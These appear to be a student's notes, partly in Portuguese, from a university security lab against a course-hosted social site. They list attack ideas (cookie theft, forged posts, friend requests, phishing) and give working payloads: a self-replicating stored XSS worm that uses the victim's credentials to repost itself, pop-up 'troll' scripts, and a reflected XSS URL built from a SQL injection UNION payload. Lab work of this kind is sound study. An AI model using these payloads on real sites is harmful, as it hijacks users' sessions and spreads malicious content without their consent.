Como explorar:
    Cookie stealing
    Publicar um post em nome da pessoa (CSRF ???)
    Aceitar/Pedir pedidos de amizade
    Phishing (ter servidor a correr clone do login)


onde existe:
    img do update profile (dar um mau filename)



// the content may be the exploit itself
<script>
fetch("http://56cb2c11fc0868ed95fe9739052b47bc7770cb37b263113029d198840253.project.ssof.rnl.tecnico.ulisboa.pt/create_post", {
        method: "POST",
        headers: {
            "Content-Type": "application/x-www-form-urlencoded",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
        },
        body: "content=%0A%3Cscript%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0Afetch(%22http%3A%2F%2F56cb2c11fc0868ed95fe9739052b47bc7770cb37b263113029d198840253.project.ssof.rnl.tecnico.ulisboa.pt%2Fcreate_p%0Aost%22%2C%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20method%3A%20%22POST%22%2C%0A%20%20%20%20%20%20%20%20headers%3A%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%22Content-Type%22%3A%20%22application%2Fx-www-form-urlencoded%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22Accept%22%3A%20%22text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2Cimage%2Favif%2Cimage%2Fwebp%2Cimage%2Fapng%2C*%2F*%3Bq%3D0.8%0A%2Capplication%2Fsigned-exchange%3Bv%3Db3%3Bq%3D0.9%22%0A%20%20%20%20%20%20%20%20%7D%2C%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20body%3A%20%22content%3DATTACKER%2BMESSAGE%2B2%26type%3DPublic%22%2C%0A%20%20%20%20%20%20%20%20credentials%3A%20%22include%22%2C%0A%20%20%20%20%20%20%20%20cache%3A%20%22no-cache%22%0A%20%20%20%20%7D%0A).then((response)%20%3D%3E%20%7B%0A%20%20%20%20response.text()%0A%20%20%20%20.then(%0A%20%20%20%20%20%20%20%20(t)%20%3D%3E%20console.log(t)%20%0A%20%20%20%20%20)%0A%7D)%3B%0A%3C%2Fscript%3E%0A&type=Public",
        credentials: "include",
        cache: "no-cache"
    }
).then((response) => {
    response.text()
    .then(
        (t) => console.log(t)
     )
});
</script>






// trollish
<script>
window.open("http://56cb2c11fc0868ed95fe9739052b47bc7770cb37b263113029d198840253.project.ssof.rnl.tecnico.ulisboa.pt/")
</script>

<script>
window.open("https://www.youtube.com/watch?v=dQw4w9WgXcQ")
</script>




REFLECTED XSS

Search my Friends get url has XSS
http://56cb2c11fc0868ed95fe9739052b47bc7770cb37b263113029d198840253.project.ssof.rnl.tecnico.ulisboa.pt/friends?search=%27+AND+1%3D0+UNION+SELECT+1%2C+2%2C+%27%3Cscript%3Ealert%28%29%3C%2Fscript%3E%27%2C+4%2C+5+%23


